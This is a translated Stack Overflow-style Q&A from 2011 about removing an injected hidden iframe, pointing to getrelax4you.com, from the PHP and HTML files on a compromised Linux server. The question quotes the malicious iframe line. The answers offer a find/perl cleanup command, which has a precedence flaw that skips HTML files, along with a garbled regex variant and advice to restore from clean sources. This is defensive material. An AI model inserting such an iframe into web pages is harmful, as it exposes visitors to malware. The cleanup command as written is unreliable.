iframe 病毒，需要从 linux 服务器上的所有 phps 和 html 文件中删除答案

【问题标题】：Iframe virus, need to be removed from all phps and html file on linux serveriframe 病毒，需要从 linux 服务器上的所有 phps 和 html 文件中删除
【发布时间】：2011-03-07 11:46:38
【问题描述】：

以下行已添加到我的 linux 服务器上的几乎所有 php 文件和一些 html 文件中在不损坏其他任何东西的情况下删除它的命令是什么？

iframe qoluu='V5pEXGSm' src='http://getrelax4you.com/in.cgi?7'width='98' height='407' style='display:none'>

上面一行的开头和结尾都有

该命令会搜索所有文件夹吗？

【问题讨论】：

您的问题后面没有“行”。
什么“下一行”？我认为 sed 可用于删除违规行。
您要删除整个 iframe，还是只删除其中的一部分？
@Mikenicee：你的下一个问题现在应该是：“它是如何到达那里的”。

标签： linux iframe command virus

【解决方案1】：

简化的解决方案，假设所有病毒代码都在一行：

find /www/directory -name '*.html' -o -name '*.php' -exec perl -i -ne 'print unless /getrelax4you\.com/' '{}' \;

简短说明：访问/www/目录下所有带有html或php扩展名的文件。使用 perl 通过逐字复制所有行到输出来编辑每个文件，除非它们包含字符串“getrelax4you.com”；已删除。

告诫购买者！在尝试之前进行备份；我可能错过了一些小细节。

【讨论】：

我不是 perl 黑客，如果这很愚蠢，请原谅我，但这不会只是删除“getrelax4you.com”部分吗？
不，它不会，如果它与给定的模式匹配，它将删除整行。
可能是这样的？ perl -pi -w -e 's!getrelax4you[^']*'(\ s*\w+\s*=\s*'[^']*'\s*)*>!<iframe src="">!simg;' *.php
如果该行包含在您不想删除的文本中怎么办？
@Andre：恕我直言，过度工程。很可能整个域 (getrelax4you.com) 都托管恶意软件，并且原始页面上没有任何合法链接指向那里。

【解决方案2】：

您的服务器已被入侵，只需将站点文件从您的源代码存储库恢复到干净的服务器上即可。

修复任何用户数据可能会更加棘手，您无法再信任数据库中的内容，因此您必须非常小心。下次祝你好运。

【讨论】：

+1 - 我其实很想回答这个问题，但是给 perl 单行代码更有趣 ;)
@Zvrba：在 perl 中做任何事情都会变得更有趣 :)